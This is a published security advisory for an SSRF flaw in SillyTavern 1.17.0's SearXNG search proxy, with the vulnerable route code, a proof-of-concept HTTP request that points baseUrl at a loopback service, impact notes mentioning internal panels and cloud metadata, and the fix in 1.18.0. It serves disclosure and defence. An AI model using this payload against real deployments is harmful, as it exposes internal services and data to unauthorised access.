GHSA-QG89-QWWH-5F3J

Vulnerability from github – Published: 2026-05-19 20:09 – Updated: 2026-05-19 20:09
VLAI
Summary
SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl
Details

Resolution

SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.

Documentation:

  • https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting
  • https://docs.sillytavern.app/administration/#security-checklist

Note on future SSRF findings

Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.

Summary

SillyTavern 1.17.0 exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body.

Confirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.

Details

The /api/search/searxng route in src/endpoints/search.js reads baseUrl from request.body and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.

Core vulnerable path:

router.post('/searxng', async (request, response) => {
    const { baseUrl, query, preferences, categories } = request.body;
    if (!baseUrl || !query) {
        return response.status(400).send('Missing required parameters');
    }

    const mainPageUrl = new URL(baseUrl);
    const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });
    ...
    const searchUrl = new URL('/search', baseUrl);
    const searchParams = new URLSearchParams();
    searchParams.append('q', query);
    ...
    const searchResult = await fetch(searchUrl, { headers: visitHeaders });
    ...
    const data = await searchResult.text();
    return response.send(data);
});

src/server-startup.js mounts this router at /api/search, and src/server-main.js applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side fetch() to attacker-selected hosts.

PoC

Attacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.

Start an internal mock service on the target host:

import http from 'node:http';

http.createServer((req, res) => {
  if (req.url === '/') {
    res.writeHead(200, { 'Content-Type': 'text/html' });
    return res.end('<html><head><link href="/client.css" rel="stylesheet"></head></html>');
  }
  if (req.url === '/client.css') {
    res.writeHead(200, { 'Content-Type': 'text/css' });
    return res.end('body{}');
  }
  if (req.url.startsWith('/search?q=')) {
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    return res.end('INTERNAL-SEARCH-RESULT');
  }
  res.writeHead(404);
  res.end('not found');
}).listen(9091, '127.0.0.1');

Then send:

POST /api/search/searxng HTTP/1.1
Host: TARGET:8000
Cookie: session-...=...
X-CSRF-Token: <token from /csrf-token>
Content-Type: application/json

{"baseUrl":"http://127.0.0.1:9091/","query":"x"}

Result based on the route logic: SillyTavern first fetches http://127.0.0.1:9091/, then fetches http://127.0.0.1:9091/search?q=x, and returns INTERNAL-SEARCH-RESULT to the attacker.

Impact

This is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.

Severity
8.5 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.17.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "sillytavern"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T20:09:52Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Resolution\n\nSillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.\n\nDocumentation: \n\n- https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting\n- https://docs.sillytavern.app/administration/#security-checklist\n\n## Note on future SSRF findings\n\nSince the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.\n\n## Summary\nSillyTavern 1.17.0 exposes `/api/search/searxng`, which accepts attacker-controlled `baseUrl` and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point `baseUrl` at an internal or loopback HTTP service and receive the `/search` response body.\n\nConfirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.\n\n## Details\nThe `/api/search/searxng` route in `src/endpoints/search.js` reads `baseUrl` from `request.body` and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.\n\nCore vulnerable path:\n\n```js\nrouter.post(\u0027/searxng\u0027, async (request, response) =\u003e {\n    const { baseUrl, query, preferences, categories } = request.body;\n    if (!baseUrl || !query) {\n        return response.status(400).send(\u0027Missing required parameters\u0027);\n    }\n\n    const mainPageUrl = new URL(baseUrl);\n    const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });\n    ...\n    const searchUrl = new URL(\u0027/search\u0027, baseUrl);\n    const searchParams = new URLSearchParams();\n    searchParams.append(\u0027q\u0027, query);\n    ...\n    const searchResult = await fetch(searchUrl, { headers: visitHeaders });\n    ...\n    const data = await searchResult.text();\n    return response.send(data);\n});\n```\n\n`src/server-startup.js` mounts this router at `/api/search`, and `src/server-main.js` applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side `fetch()` to attacker-selected hosts.\n\n## PoC\nAttacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.\n\nStart an internal mock service on the target host:\n\n```js\nimport http from \u0027node:http\u0027;\n\nhttp.createServer((req, res) =\u003e {\n  if (req.url === \u0027/\u0027) {\n    res.writeHead(200, { \u0027Content-Type\u0027: \u0027text/html\u0027 });\n    return res.end(\u0027\u003chtml\u003e\u003chead\u003e\u003clink href=\"/client.css\" rel=\"stylesheet\"\u003e\u003c/head\u003e\u003c/html\u003e\u0027);\n  }\n  if (req.url === \u0027/client.css\u0027) {\n    res.writeHead(200, { \u0027Content-Type\u0027: \u0027text/css\u0027 });\n    return res.end(\u0027body{}\u0027);\n  }\n  if (req.url.startsWith(\u0027/search?q=\u0027)) {\n    res.writeHead(200, { \u0027Content-Type\u0027: \u0027text/plain\u0027 });\n    return res.end(\u0027INTERNAL-SEARCH-RESULT\u0027);\n  }\n  res.writeHead(404);\n  res.end(\u0027not found\u0027);\n}).listen(9091, \u0027127.0.0.1\u0027);\n```\n\nThen send:\n\n```http\nPOST /api/search/searxng HTTP/1.1\nHost: TARGET:8000\nCookie: session-...=...\nX-CSRF-Token: \u003ctoken from /csrf-token\u003e\nContent-Type: application/json\n\n{\"baseUrl\":\"http://127.0.0.1:9091/\",\"query\":\"x\"}\n```\n\nResult based on the route logic: SillyTavern first fetches `http://127.0.0.1:9091/`, then fetches `http://127.0.0.1:9091/search?q=x`, and returns `INTERNAL-SEARCH-RESULT` to the attacker.\n\n## Impact\nThis is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.",
  "id": "GHSA-qg89-qwwh-5f3j",
  "modified": "2026-05-19T20:09:52Z",
  "published": "2026-05-19T20:09:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-qg89-qwwh-5f3j"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SillyTavern/SillyTavern"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.